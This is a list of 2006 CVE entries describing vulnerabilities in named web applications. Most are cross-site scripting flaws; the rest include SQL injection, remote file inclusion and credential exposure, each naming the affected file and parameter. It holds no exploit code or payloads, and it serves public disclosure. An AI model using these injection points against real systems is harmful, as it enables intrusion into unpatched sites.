[CVE-2006-3257] Multiple cross-site scripting (XSS) vulnerabilities in Claroline 1.7.7 allow remote attackers to inject arbitrary HTML or web script via unspecified attack vectors, possibly including (1) calendar/myagenda.php, (2) document/document.php, (3) phpbb/newtopic.php, (4) tracking/userLog.php, and (5) wiki/page.php.
[CVE-2006-3253] ** DISPUTED ** Cross-site scripting (XSS) vulnerability in member.php in vBulletin 3.5.x allows remote attackers to inject arbitrary web script or HTML via the u parameter. NOTE: the vendor has disputed this report, stating that they have been unable to replicate the issue and that "the userid parameter is run through our filtering system as an unsigned integer."
[CVE-2006-3247] Multiple cross-site scripting (XSS) vulnerabilities in show.php in GL-SH Deaf Forum 6.4.3 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) search, (2) page, and (3) action parameters. NOTE: the provenance of this information is unknown.
[CVE-2006-3246] Cross-site scripting (XSS) vulnerability in show.php in GL-SH Deaf Forum 6.4.3 and earlier allows remote attackers to inject arbitrary web script or HTML via the sort parameter.
[CVE-2006-3245] Multiple cross-site scripting (XSS) vulnerabilities in activatemember in mvnForum 1.0 GA and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) member and (2) activatecode parameters.
[CVE-2006-3241] Cross-site scripting (XSS) vulnerability in messages.php in XennoBB 1.0.5 and earlier allows remote attackers to inject arbitrary web script or HTML via the tid parameter.
[CVE-2006-3240] Cross-site scripting (XSS) vulnerability in classes/ui.class.php in dotProject 2.0.3 and earlier allows remote attackers to inject arbitrary web script or HTML via the login parameter.
[CVE-2006-3237] Cross-site scripting (XSS) vulnerability in index.php in Enterprise Groupware System (EGS) 1.2.4 and earlier allows remote attackers to inject arbitrary web script or HTML via the module parameter.
[CVE-2006-3235] Multiple cross-site scripting (XSS) vulnerabilities in index.php in FineShop 3.0 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) promocja, (2) wysw, or (3) id_produc parameters.
[CVE-2006-3233] Cross-site scripting (XSS) vulnerability in openwebmail-read.pl in Open WebMail (OWM) 2.52, and other versions released before 06/18/2006, allows remote attackers to inject arbitrary web script or HTML via the from field. NOTE: some third party sources have mentioned the "to" and "from" fields, although CVE analysis shows that these are associated with the previous version, a different executable, and a different CVE.
[CVE-2006-3232] Unspecified vulnerability in IBM WebSphere Application Server before 6.0.2.11 has unknown impact and attack vectors because the "UserNameToken cache was improperly used."
[CVE-2006-3231] Unspecified vulnerability in IBM WebSphere Application Server (WAS) before 6.0.2.11, when fileServingEnabled is true, allows remote attackers to obtain JSP source code and other sensitive information via "URIs with special characters."
[CVE-2006-3230] Cross-site scripting (XSS) vulnerability in index.tmpl in Azureus Tracker 2.4.0.2 and earlier (Java BitTorrent Client Tracker) allows remote attackers to inject arbitrary web script or HTML via the search parameter.
[CVE-2006-3229] Cross-site scripting (XSS) vulnerability in Open WebMail (OWM) 2.52, and other versions released before 05/12/2006, allows remote attackers to inject arbitrary web script or HTML via the (1) To and (2) From fields in openwebmail-main.pl, and possibly (3) other unspecified vectors related to "openwebmailerror calls that need to display HTML."
[CVE-2006-3227] Interpretation conflict between Internet Explorer and other web browsers such as Mozilla, Opera, and Firefox might allow remote attackers to modify the visual presentation of web pages and possibly bypass protection mechanisms such as content filters via ASCII characters with the 8th bit set, which could be stripped by Internet Explorer to render legible text, but not when using other browsers. NOTE: there has been significant discussion about this issue, and as of 20060625, it is not clear where the responsibility for this issue lies, although it might be due to vagueness within the associated standards. NOTE: this might only be exploitable with certain encodings.
[CVE-2006-3225] Cross-site scripting (XSS) vulnerability in Sun ONE Application Server 7 before Update 9, Java System Application Server 7 2004Q2 before Update 5, and Java System Application Server Enterprise Edition 8.1 2005 Q1 allows remote attackers to inject arbitrary HTML or web script via unknown vectors.
[CVE-2006-3213] SQL injection vulnerability in WeBBoA Hosting 1.1 allows remote attackers to execute arbitrary SQL commands via the id parameter to an unspecified script, possibly host/yeni_host.asp.
[CVE-2006-3212] Cross-site scripting (XSS) vulnerability in sign.php in cjGuestbook 1.3 and earlier allows remote attackers to inject web script or HTML via the (1) name, (2) email, (3) add, and (4) wName parameters. NOTE: the provenance of this information is unknown.
[CVE-2006-3197] Cross-site scripting (XSS) vulnerability in Invision Power Board (IPB) 2.1.6 and earlier allows remote attackers to inject arbitrary web script or HTML via a POST that contains hexadecimal-encoded HTML.
[CVE-2006-3195] Cross-site scripting (XSS) vulnerability in index.php in singapore 0.10.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the template parameter.
[CVE-2006-3191] Cross-site scripting (XSS) vulnerability in comment.php in MPCS 0.2 allows remote attackers to inject arbitrary web script or HTML via the pageid parameter.
[CVE-2006-3189] Cross-site scripting (XSS) vulnerability in administration/tblcontent/login1.php in HotPlug CMS 1.0 allows remote attackers to inject arbitrary web script or HTML via the msg parameter.
[CVE-2006-3187] Multiple cross-site scripting (XSS) vulnerabilities in Sharky e-shop 3.05 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) maingroup and (2) secondgroup parameters to (a) search_prod_list.asp, and the (3) maingroup parameter to (b) meny2.asp. NOTE: it is possible that this is resultant from SQL injection or a forced SQL error.
[CVE-2006-3186] Multiple cross-site scripting (XSS) vulnerabilities in CMS Faethon 1.3.2 allow remote attackers to inject arbitrary web script or HTML via the mainpath parameter to (1) data/footer.php and (2) admin/header.php. NOTE: the provenance of this information is unknown.
[CVE-2006-3183] Cross-site scripting (XSS) vulnerability in index.php in MobeScripts Mobile Space Community 2.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) browse parameter, which is not filtered in the resulting error message, and multiple unspecified input fields, including those involved when (2) updating a profile, (3) posting comments or entries in a blog, (4) uploading files, (5) picture captions, and (6) sending a private message (PM).
[CVE-2006-3180] Cross-site scripting (XSS) vulnerability in ftp_index.php in Confixx Pro 3.0 allows remote attackers to inject arbitrary web script or HTML via the path parameter.
[CVE-2006-3179] Cross-site scripting (XSS) vulnerability in tools_ftp_pwaendern.php in Confixx Pro 3.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the account parameter.
[CVE-2006-3169] Multiple cross-site scripting (XSS) vulnerabilities in CS-Forum 0.81 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) msg_result and (2) rep_titre parameters in (a) read.php
[CVE-2006-3166] Cross-site scripting (XSS) vulnerability in propview.php in Free Realty 2.9-0.6 and earlier allows remote attackers to execute arbitrary web script or HTML via the sort parameter.
[CVE-2006-3160] Cross-site scripting (XSS) vulnerability in fm.php in ONEdotOH Simple File Manager (SFM) 0.24a and earlier allows remote attackers to inject arbitrary web script or HTML via the msg parameter.
[CVE-2006-3157] Cross-site scripting (XSS) vulnerability in index.php in Thinkfactory UltimateGoogle 1.00 and earlier allows remote attackers to inject arbitrary web script or HTML via the REQ parameter.
[CVE-2006-3156] Cross-site scripting (XSS) vulnerability in index.cgi in Ultimate eShop 1.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the subid parameter.
[CVE-2006-3155] Multiple cross-site scripting (XSS) vulnerabilities in Ultimate Auction 1.0 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) item parameter in (a) emailtofriend.pl or (b) violation.pl, (2) seller parameter in (c) vsoa.pl, (3) user parameter in (d) userask.pl or (e) leavefeed.pl, (4) itemnum parameter in userask.pl, (5) category parameter in (f) itemlist.pl, and the (6) query parameter in (g) search.pl.
[CVE-2006-3153] Cross-site scripting (XSS) vulnerability in index.pl in Ultimate Estate 1.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the cat parameter.
[CVE-2006-3151] Cross-site scripting (XSS) vulnerability in index.php in AssoCIateD (aka ACID) 1.2.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the menu parameter.
[CVE-2006-3149] Cross-site scripting (XSS) vulnerability in topic.php in phpMyForum 4.1.3 and earlier allows remote attackers to inject arbitrary web script or HTML via the highlight parameter.
[CVE-2006-3143] Cross-site scripting (XSS) vulnerability in icue_login.asp in Maximus SchoolMAX 4.0.1 and earlier iCue and iParent applications allows remote attackers to inject arbitrary web script or HTML via the error_msg parameter.
[CVE-2006-3141] Cross-site scripting (XSS) vulnerability in details.cfm in Tradingeye Shop R4 and earlier allows remote attackers to inject arbitrary web script or HTML via the image parameter.
[CVE-2006-3138] Multiple cross-site scripting (XSS) vulnerabilities in phpMyDirectory 10.4.5 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) PIC parameter in offers-pix.php, (2) from parameter in cp/index.php, and (3) action parameter in cp/admin_index.php.
[CVE-2006-3137] Cross-site scripting (XSS) vulnerability in productDetail.asp in Edge eCommerce Shop allows remote attackers to inject arbitrary web script or HTML via the cart_id parameter.
[CVE-2006-3136] ** DISPUTED ** Multiple PHP remote file inclusion vulnerabilities in Nucleus 3.23 allow remote attackers to execute arbitrary PHP code via a URL in the DIR_LIBS parameter in (1) path/action.php, and to files in path/nucleus including (2) media.php, (3) /xmlrpc/server.php, and (4) /xmlrpc/api_metaweblog.inc.php. NOTE: this is a similar vulnerability to CVE-2006-2583. NOTE: this issue has been disputed by third parties, who state that the DIR_LIBS parameter is defined in an include file before being used.
[CVE-2006-3135] Multiple SQL injection vulnerabilities in CMS Mundo 1.0 build 008, and possibly other versions, allow remote attackers to execute arbitrary SQL commands via the (1) news_id parameter in the (a) news module, (2) searchstring parameter in (b) the search module, (3) id parameter in (c) the webshop module, (4) username parameter in (d) index.php, and (5) Name, (6) Address, (7) Zip, (8) City, (9) Country, and (10) Email fields during (e) a user profile update.
[CVE-2006-3132] Cross-site scripting (XSS) vulnerability in qtofm.php4 in QTOFileManager 1.0 allows remote attackers to inject arbitrary web script or HTML via the msg parameter, as originally reported for index.php.
[CVE-2006-3131] Multiple cross-site scripting (XSS) vulnerabilities in Clubpage allow remote attackers to inject arbitrary web script or HTML via the (1) news_archive, (2) language, and (3) intranetLogin parameters in (a) index.php
[CVE-2006-3129] Multiple cross-site scripting (XSS) vulnerabilities in index.php in NC LinkList 1.2 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) cat and (2) view parameters.
[CVE-2006-3110] Cross-site scripting (XSS) vulnerability in main.php in Chipmailer 1.09 allows remote attackers to inject arbitrary web script or HTML via the (1) name, (2) betreff, (3) mail, and (4) text parameters.
[CVE-2006-3109] Cross-site scripting (XSS) vulnerability in Cisco CallManager 3.3 before 3.3(5)SR3, 4.1 before 4.1(3)SR4, 4.2 before 4.2(3), and 4.3 before 4.3(1), allows remote attackers to inject arbitrary web script or HTML via the (1) pattern parameter in ccmadmin/phonelist.asp and (2) arbitrary parameters in ccmuser/logon.asp, aka bugid CSCsb68657.
[CVE-2006-3106] Cross-site scripting (XSS) vulnerability in index.php in phpMyDesktop|Arcade 1.0 allows remote attackers to inject arbitrary web script or HTML via the subsite parameter in the subsite todo.
[CVE-2006-3103] Cross-site scripting (XSS) vulnerability in Bitweaver 1.3 allows remote attackers to inject arbitrary web script or HTML via the (1) error parameter in users/login.php and the (2) feedback parameter in articles/index.php.
[CVE-2006-3102] Race condition in articles/BitArticle.php in Bitweaver 1.3, when run on Apache with the mod_mime extension, allows remote attackers to execute arbitrary PHP code by uploading arbitrary files with double extensions, which are stored for a small period of time under the webroot in the temp/articles directory.
[CVE-2006-3101] Cross-site scripting (XSS) vulnerability in LogonProxy.cgi in Cisco Secure ACS for UNIX 2.3 allows remote attackers to inject arbitrary web script or HTML via the (1) error, (2) SSL, and (3) Ok parameters.
[CVE-2006-3095] Multiple cross-site scripting (XSS) vulnerabilities in iPostMX 2005 2.0 and earlier allow remote attackers to inject arbitrary web script or HTML via the RETURNURL parameter in (1) userlogin.cfm and (2) account.cfm.
[CVE-2006-3089] Multiple cross-site scripting (XSS) vulnerabilities in PhpMyFactures 1.0, and possibly 1.2 and earlier, allow remote attackers to inject arbitrary web script or HTML via the (1) prefixe_dossier parameter in (a) /inc/header.php
[CVE-2006-3088] Cross-site scripting (XSS) vulnerability in index.php in Car Classifieds allows remote attackers to inject arbitrary web script or HTML via the make_id parameter. NOTE: the provenance of this information is unknown.
[CVE-2006-3087] Multiple cross-site scripting (XSS) vulnerabilities in EZGallery 1.5 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) pUserID, (2) aid, (3) aname, (4) uid, and (5) m parameters in (a) common/galleries.asp
[CVE-2006-3080] Cross-site scripting (XSS) vulnerability in viewposts.cfm in aXentForum II and earlier allows remote attackers to inject arbitrary web script or HTML via the startrow parameter.
[CVE-2006-3079] Cross-site scripting (XSS) vulnerability in index.cfm in SSPwiz Plus 1.0.7 and earlier allows remote attackers to inject arbitrary web script or HTML via the message parameter.
[CVE-2006-3077] Cross-site scripting (XSS) vulnerability in guestbook.cfm in aXentGuestbook 1.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the startrow parameter.
[CVE-2006-3073] Multiple cross-site scripting (XSS) vulnerabilities in the WebVPN feature in the Cisco VPN 3000 Series Concentrators and Cisco ASA 5500 Series Adaptive Security Appliances (ASA), when in WebVPN clientless mode, allow remote attackers to inject arbitrary web script or HTML via the domain parameter in (1) dnserror.html and (2) connecterror.html, aka bugid CSCsd81095 (VPN3k) and CSCse48193 (ASA). NOTE: the vendor states that "WebVPN full-network-access mode" is not affected, despite the claims by the original researcher.
[CVE-2006-3071] Cross-site scripting (XSS) vulnerability in index.php in MP3 Search/Archive 1.2 allows remote attackers to inject arbitrary web script or HTML via the (1) keywords parameter, as used by the "search box", and (2) res parameter.
[CVE-2006-3063] Multiple cross-site scripting (XSS) vulnerabilities in myPHP Guestbook 1.x through 2.0.0-r1 and before 2.0.1 RC5 allow remote attackers to inject arbitrary web script or HTML via the (1) comment, (2) email, (3) homepage, (4) id, (5) name, and (6) text parameters in (a) index.php, the (7) comment, (8) email, (9) homepage, (10) number, (11) name, and (12) text parameters in (b) admin/guestbook.php, and the (13) email, (14) homepage, (15) icq, (16) name, and (17) text parameters in (c) admin/edit.php.
[CVE-2006-3062] Cross-site scripting (XSS) vulnerability in index.php in myPHP Guestbook 2.0.4 and earlier allows remote attackers to inject arbitrary web script or HTML via the lang parameter.
[CVE-2006-3061] Multiple cross-site scripting (XSS) vulnerabilities in 5 Star Review allow remote attackers to inject arbitrary web script or HTML via the (1) sort parameter in index2.php, (2) item_id parameter in report.php, (3) search_term parameter (aka the "search box") in search_reviews.php, (4) the profile field in usercp/profile_edit1.php, and the (5) review field in review_form.php.
[CVE-2006-3060] Cross-site scripting (XSS) vulnerability in P.A.I.D 2.2 allows remote attackers to inject arbitrary web script or HTML via the (1) read parameter in index.php, (2) farea parameter in faq.php, and (3) unspecified input fields on the "My Account" login page.
[CVE-2006-3052] Cross-site scripting (XSS) vulnerability in Event Registration allows remote attackers to inject arbitrary web script or HTML via the (1) event_id parameter to view-event-details.php or (2) select_events parameter to event-registration.php. NOTE: the provenance of this information is unknown.
[CVE-2006-3049] Multiple cross-site scripting (XSS) vulnerabilities in booking3.php in Mole Group Ticket Booking Script allow remote attackers to inject arbitrary web script or HTML via the (1) name, (2) address1, (3) address2, (4) county, (5) postcode, (6) email, (7) phone, or (8) mobile parameters to booking2.php.
[CVE-2006-3047] Cross-site scripting (XSS) vulnerability in TikiWiki 1.9.3.2 and possibly earlier versions allows remote attackers to inject arbitrary web script or HTML via unknown attack vectors.
[CVE-2006-3044] Cross-site scripting (XSS) vulnerability in LogiSphere 1.6.0 allows remote attackers to inject arbitrary web script or HTML via the URL, which is reflected in an error page.
[CVE-2006-3043] Cross-site scripting (XSS) vulnerability in search.cfm in CreaFrameXe (CFXe) CMS 2.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the voltext_suche parameter.
[CVE-2006-3039] Cross-site scripting (XSS) vulnerability in index.php in Cescripts Realty Home Rent allows remote attackers to inject arbitrary web script or HTML via the sel_menu parameter. NOTE: the vendor notified CVE on 20060823 that "All issues concerning this script and others at cescripts.com have been addressed and fixed."
[CVE-2006-3038] Cross-site scripting (XSS) vulnerability in index.php in Cescripts Realty Room Rent allows remote attackers to inject arbitrary web script or HTML via the sel_menu parameter. NOTE: the vendor notified CVE on 20060823 that "All issues concerning this script and others at cescripts.com have been addressed and fixed."
[CVE-2006-3037] Multiple cross-site scripting (XSS) vulnerabilities in publish.php in ST AdManager Lite allow remote attackers to inject arbitrary web script or HTML via the (1) title, (2) description, (3) article, (4) bio, and (5) name parameters.
[CVE-2006-3036] Multiple cross-site scripting (XSS) vulnerabilities in 35mmslidegallery 6.0 allow remote attackers to inject arbitrary web script or HTML via the (1) imgdir parameter in (a) index.php, and the (2) w, (3) h, and (4) t parameters in (b) popup.php.
[CVE-2006-3035] Multiple cross-site scripting (XSS) vulnerabilities in addwords.php in MyScrapbook 3.1 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) name and (2) comment parameters. NOTE: the provenance of this information is unknown.
[CVE-2006-3033] Cross-site scripting (XSS) vulnerability in MyScrapbook 3.1 allows remote attackers to inject arbitrary web script or HTML via the input box in singlepage.php when submitting scrapbook pages.
[CVE-2006-3032] Multiple cross-site scripting (XSS) vulnerabilities in Xtreme ASP Photo Gallery 1.05 and earlier, and possibly 2.0 (trial), allow remote attackers to inject arbitrary web script or HTML via the (1) catname and (2) total parameters in (a) displaypic.asp, and the (3) catname parameter in (b) displaythumbs.asp.
[CVE-2006-3031] Multiple cross-site scripting (XSS) vulnerabilities in index.asp in fipsCMS 4.5 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) w, (2) phcat, (3) dayid, and (4) calw parameters.
[CVE-2006-3030] Multiple cross-site scripting (XSS) vulnerabilities in DwZone Shopping Cart 1.1.9 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) ToCategory and (2) FromCategory parameters to (a) ProductDetailsForm.asp and (3) UserName and (4) Password parameters to (b) LogIn/VerifyUserLog.asp.
[CVE-2006-3029] Cross-site scripting (XSS) vulnerability in default.asp in ClickTech Clickcart 6.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the cat parameter.
[CVE-2006-3027] Multiple SQL injection vulnerabilities in Enthrallwebe ePhotos 2.2 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) CAT_ID parameter in (a) subphotos.asp and (b) subLevel2.asp, the (2) AL_ID parameter in (c) photo.asp, and the (3) SUB_ID parameter in (d) subLevel2.asp.
[CVE-2006-3026] Multiple cross-site scripting (XSS) vulnerabilities in ClickGallery 5.0 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) gallery_id parameter in gallery.asp and (2) parentcurrentpage parameter in view_gallery.asp.
[CVE-2006-3025] Cross-site scripting (XSS) vulnerability in Cal.PHP3 in Chris Lea Lucid Calendar 0.22 allows remote attackers to inject arbitrary web script or HTML via unspecified parameters. NOTE: the provenance of this information is unknown.
[CVE-2006-3024] Multiple cross-site scripting (XSS) vulnerabilities in EvGenius Counter 3.4 and earlier allow remote attackers to inject arbitrary web script or HTML via the page parameter in (1) monthly.php and (2) daily.php.
[CVE-2006-3023] Multiple cross-site scripting (XSS) vulnerabilities in thumbnails.asp in Uapplication Uphotogallery 1.1 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) s and (2) block parameters.
[CVE-2006-3022] Cross-site scripting (XSS) vulnerability in zoom.php in fipsGallery 1.5 and earlier allows remote attackers to inject arbitrary web script or HTML via the path parameter.
[CVE-2006-3021] Multiple cross-site scripting (XSS) vulnerabilities in BlueCollar i-Gallery 4.1 PLUS and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) n and (2) d parameters in (a) login.asp and the d parameter in (b) igallery.asp.
[CVE-2006-3020] Multiple cross-site scripting (XSS) vulnerabilities in FullPhoto.asp in WS-Album 1.1 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) image and (2) PublisedDate parameters.
[CVE-2006-3009] Multiple cross-site scripting (XSS) vulnerabilities in Open Business Management (OBM) 1.0.3 pl1 allow remote attackers to inject arbitrary HTML or web script via the (1) tf_lang, (2) tf_name, (3) tf_user, (4) tf_lastname, (5) tf_contact, (6) tf_datebefore, and (7) tf_dateafter parameters to files such as (a) publication/publication_index.php, (b) group/group_index.php, (c) user/user_index.php, (d) list/list_index.php, and (e) company/company_index.php.
[CVE-2006-3007] Multiple cross-site scripting (XSS) vulnerabilities in SHOUTcast 1.9.5 allow remote attackers to inject arbitrary HTML or web script via the DJ fields (1) Description, (2) URL, (3) Genre, (4) AIM, and (5) ICQ.
[CVE-2006-3006] Cross-site scripting (XSS) vulnerability in iFoto 0.20, and possibly other versions before 0.50, allows remote attackers to inject arbitrary HTML or web script via a base64-encoded file parameter.
[CVE-2006-3004] Multiple cross-site scripting (XSS) vulnerabilities in Ez Ringtone Manager allow remote attackers to inject arbitrary web script or HTML via the (1) id parameter in player.php and (2) keyword parameter when performing a search.
[CVE-2006-3002] Cross-site scripting (XSS) vulnerability in details.php in Easy Ad-Manager allows remote attackers to inject arbitrary web script or HTML via the mbid parameter, which is reflected in an error message. NOTE: on 20060829, the vendor notified CVE that this issue has been fixed.
[CVE-2006-3001] Cross-site scripting (XSS) vulnerability in search.php in OkScripts OkMall 1.0 allows remote attackers to inject arbitrary web script or HTML via the page parameter. NOTE: this might be resultant from another vulnerability, since the XSS is reflected in an error message.
[CVE-2006-3000] Cross-site scripting (XSS) vulnerability in search.php in OkScripts OkArticles 1.0 allows remote attackers to inject arbitrary web script or HTML via the q parameter.
[CVE-2006-2999] Cross-site scripting (XSS) vulnerability in search.php in OkScripts QuickLinks 1.1 allows remote attackers to inject arbitrary web script or HTML via the q parameter.
[CVE-2006-2997] Cross-site scripting (XSS) vulnerability in ZMS 2.9 and earlier, when register_globals is enabled, allows remote attackers to inject arbitrary web script or HTML via the raw parameter in the search field.
[CVE-2006-2995] Multiple PHP remote file inclusion vulnerabilities in WebprojectDB 0.1.3 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the INCDIR parameter in (1) include/nav.php and (2) include/lang.php.
[CVE-2006-2994] Multiple cross-site scripting (XSS) vulnerabilities in index.php in phazizGuestbook 2.0 allow remote attackers to inject arbitrary web script or HTML via the (1) name, (2) email, (3) url fields, and (4) text field (content parameter).
[CVE-2006-2992] Cross-site scripting (XSS) vulnerability in display.asp in My Photo Scrapbook 1.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the key_m parameter.
[CVE-2006-2991] Multiple cross-site scripting (XSS) vulnerabilities in Ringlink 3.2 allow remote attackers to inject arbitrary web script or HTML via a JavaScript URI in the SRC attribute of an IMG element, and possibly other manipulations, in the ringid parameter in (1) next.cgi, (2) stats.cgi, or (3) list.cgi.
[CVE-2006-2990] Cross-site scripting (XSS) vulnerability in default.asp in VanillaSoft Helpdesk 2005 and earlier allows remote attackers to inject arbitrary web script or HTML via the username parameter.
[CVE-2006-2989] Cross-site scripting (XSS) vulnerability in listpics.asp in ASP ListPics 4.3 and earlier allows remote attackers to inject arbitrary web script or HTML via the info parameter.
[CVE-2006-2988] Cross-site scripting (XSS) vulnerability in dictionary.php in Chemical Dictionary allows remote attackers to inject arbitrary web script or HTML via the keyword parameter in a browse action.
[CVE-2006-2986] Multiple cross-site scripting (XSS) vulnerabilities in Baby Katie Media (a) very Simple Car Lister (vSCAL) 1.0 and (b) very simple Realty Lister (vsREAL) 1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) lid parameter in index.php and the (2) title parameter in myslideshow.php.
[CVE-2006-2984] Cross-site scripting (XSS) vulnerability in index.php in IntegraMOD 1.4.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the STYLE_URL parameter. NOTE: it is possible that this issue is resultant from SQL injection.
[CVE-2006-2979] Multiple cross-site scripting (XSS) vulnerabilities in ViArt Shop Free 2.5.5, and possibly other distributions including Light, Standard, and Enterprise, allow remote attackers to inject arbitrary web script or HTML via the (1) forum_id parameter in forum.php, which is not properly handled in block_forum_topics.php, and (2) item_id parameter in reviews.php, which is not properly handled in block_reviews.php.
[CVE-2006-2975] Multiple cross-site scripting (XSS) vulnerabilities in pblguestbook.php in PBL Guestbook 1.31 allow remote attackers to inject arbitrary web script or HTML via javascript in the SRC attribute of IMG tags in the (1) name, (2) email, and (3) website parameters, which bypasses XSS protection mechanisms that check for SCRIPT tags but not IMG. NOTE: portions of this description's details are obtained from third party information.
[CVE-2006-2974] Multiple cross-site scripting (XSS) vulnerabilities in EmailArchitect Email Server 6.1.0.5 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) errCode and (2) uid parameter in (a) default.asp and (3) dname parameter in (b) /admin/dns.asp and (c) /additional/regdomain_done.asp.
[CVE-2006-2969] Cross-site scripting (XSS) vulnerability in L0j1k tinyMuw 0.1.0 allows remote attackers to inject arbitrary web script or HTML via a javascript URI in the SRC attribute of an IMG element in the input box in quickchat.php, and possibly other manipulations.
[CVE-2006-2968] Cross-site scripting (XSS) vulnerability in search.php in PHP Labware LabWiki 1.0 allows remote attackers to inject arbitrary web script or HTML via the search input box (query parameter).
[CVE-2006-2966] Cross-site scripting (XSS) vulnerability in Particle Soft Particle Wiki 1.0.2 allows remote attackers to inject arbitrary web script or HTML via a BR element with an extraneous IMG tag and a STYLE attribute that contains "/**/" comment sequences, which bypasses the XSS protection scheme.
[CVE-2006-2965] Multiple cross-site scripting (XSS) vulnerabilities in Particle Soft Particle Whois 1.0.3 allow remote attackers to inject arbitrary web script or HTML via (1) the target parameter in index.php and (2) the "input box."
[CVE-2006-2963] Cross-site scripting (XSS) vulnerability in Suchergebnisse.asp in Cabacos Web CMS 3.8.498 and earlier allows remote attackers to inject arbitrary web script or HTML via the suchtext parameter.
[CVE-2006-2957] Cross-site scripting (XSS) vulnerability in i.List 1.5 beta and earlier allows remote attackers to inject arbitrary web script or HTML via the banurl parameter to add.php. NOTE: the provenance of this information is unknown
[CVE-2006-2956] Multiple cross-site scripting (XSS) vulnerabilities in i.List 1.5 beta and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) searchword parameter to search.php or (2) siteurl parameter to add.php.
[CVE-2006-2955] Multiple cross-site scripting (XSS) vulnerabilities in KAPhotoservice 7.5 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) New Category (newcategory) or (2) apage parameter to (a) edtalbum.asp, or the (3) cat or (4) albumid parameter to (b) album.asp.
[CVE-2006-2953] Cross-site scripting (XSS) vulnerability in default.asp in OfficeFlow 2.6 and earlier allows remote attackers to inject arbitrary web script or HTML via the sqlType parameter.
[CVE-2006-2951] Multiple cross-site scripting (XSS) vulnerabilities in Net Portal Dynamic System (NPDS) 5.10 and earlier allow remote attackers to inject arbitrary web script and HTML via the (1) Titlesitename or (2) sitename parameter to (a) header.php, (3) nuke_url parameter to (b) meta/meta.php, (4) forum parameter to (c) viewforum.php, (5) post_id, (6) forum, (7) topic, or (8) arbre parameter to (d) editpost.php, or (9) uname or (10) email parameter to (e) user.php.
[CVE-2006-2949] Cross-site scripting (XSS) vulnerability in private.php in MyBB 1.1.2 allows remote attackers to inject arbitrary web script or HTML via the do parameter.
[CVE-2006-2948] A-CART 2.0 stores the acart2_0.mdb file under the web document root with insufficient access control, which allows remote attackers to obtain username and password information.
[CVE-2006-2946] Dmx Forum 2.1a stores _includes/bd.inc under the web root with insufficient access control, which allows remote attackers to obtain database username and password information.
[CVE-2006-2943] Unspecified vulnerability in CGI-RESCUE WebFORM 4.1 and earlier allows remote attackers to inject email headers, which facilitates sending spam messages. NOTE: the details for this issue are obtained from third party information.
[CVE-2006-2942] TWiki 4.0.0, 4.0.1, and 4.0.2 allows remote attackers to gain Twiki administrator privileges via a TWiki.TWikiRegistration form with a modified action attribute that references the Sandbox web instead of the user web, which can then be used to associate the user's login name with the WikiName of a member of the TWikiAdminGroup.
[CVE-2006-2927] Multiple cross-site scripting (XSS) vulnerabilities in post.asp in CodeAvalanche FreeForum (aka CAForum) 1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) msg_subject and (2) msg_body parameters. NOTE: The provenance of this information is unknown
[CVE-2006-2924] Ingate Firewall in the SIP module before 4.4.1 and SIParator before 4.4.1, when TLS is enabled or when SSL/TLS is enabled in the web server, allows remote attackers to cause a denial of service (crash) via a crafted SSL/TLS handshake.
[CVE-2006-2913] Cross-site scripting (XSS) vulnerability in SelectaPix 1.31 allows remote attackers to inject arbitrary web script or HTML via the albumID parameter to (1) popup.php and (2) view_album.php.
[CVE-2006-2903] Cross-site scripting (XSS) vulnerability in admin.php in Particle Links 1.2.2 allows remote attackers to inject arbitrary web script or HTML via the username parameter.
[CVE-2006-2901] The web server for D-Link Wireless Access-Point (DWL-2100ap) firmware 2.10na and earlier allows remote attackers to obtain sensitive system information via a request to an arbitrary .cfg file, which returns configuration information including passwords.
[CVE-2006-2899] Unspecified vulnerability in ESTsoft InternetDISK versions before 2006/04/20 allows remote authenticated users to execute arbitrary code, possibly by uploading a file with multiple extensions into the WebLink directory.
[CVE-2006-2897] Cross-site scripting (XSS) vulnerability in FunkBoard 0.71 allows remote attackers to inject arbitrary HTML or web script via unspecified vectors.
[CVE-2006-2895] Cross-site scripting (XSS) vulnerability in MediaWiki 1.6.0 up to versions before 1.6.7 allows remote attackers to inject arbitrary HTML and web script via the edit form.
[CVE-2006-2893] index.php in GANTTy 1.0.3 allows remote attackers to obtain the full path of the web server via an invalid lang parameter in an authenticate action.
[CVE-2006-2892] Cross-site scripting (XSS) vulnerability in index.php in GANTTy 1.0.3 allows remote attackers to inject arbitrary HTML and web script via the message parameter in a login action.
[CVE-2006-2891] Cross-site scripting (XSS) vulnerability in admin/index.php for Pixelpost 1-5rc1-2 and earlier allows remote attackers to inject arbitrary HTML or web script via the loginmessage parameter.
[CVE-2006-2885] Multiple cross-site scripting (XSS) vulnerabilities in KnowledgeTree Open Source 3.0.3 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) fDocumentId parameter in view.php and the (2) fSearchableText parameter in /search/simpleSearch.php.
